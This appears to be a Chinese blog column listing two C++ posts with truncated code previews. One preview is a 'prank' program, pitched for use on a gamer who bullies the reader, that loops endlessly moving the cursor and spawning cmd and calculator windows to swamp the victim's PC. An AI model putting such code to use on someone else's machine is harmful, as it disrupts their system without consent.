骗人
imX2G
I love c++ ,X2G!
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
搞人程序C++
(可以搞爱玩游戏还老欺负你的人你可以在他玩的正嗨的时候给他来一下!) #include<bits/stdc++.h> #include<conio.h> #include<windows.h> using namespace std; int main() { while(1) { SetCursorPos(rand() % 10000,rand() % 10000); system("start cmd"); system("start calc")原创 2022-03-13 14:18:42 · 4329 阅读 · 3 评论 -
C++游戏开始设置(1.0)
#include<bits/stdc++.h> #include<windows.h> #include<conio.h> using namespace std; void happyprint(long long a,char b[10000000]){ int i=0; while(a!=0){ if(a!=0) { SetConsoleTextAttribute(GetStdHandle(S.原创 2022-02-17 15:34:45 · 1420 阅读 · 0 评论
分享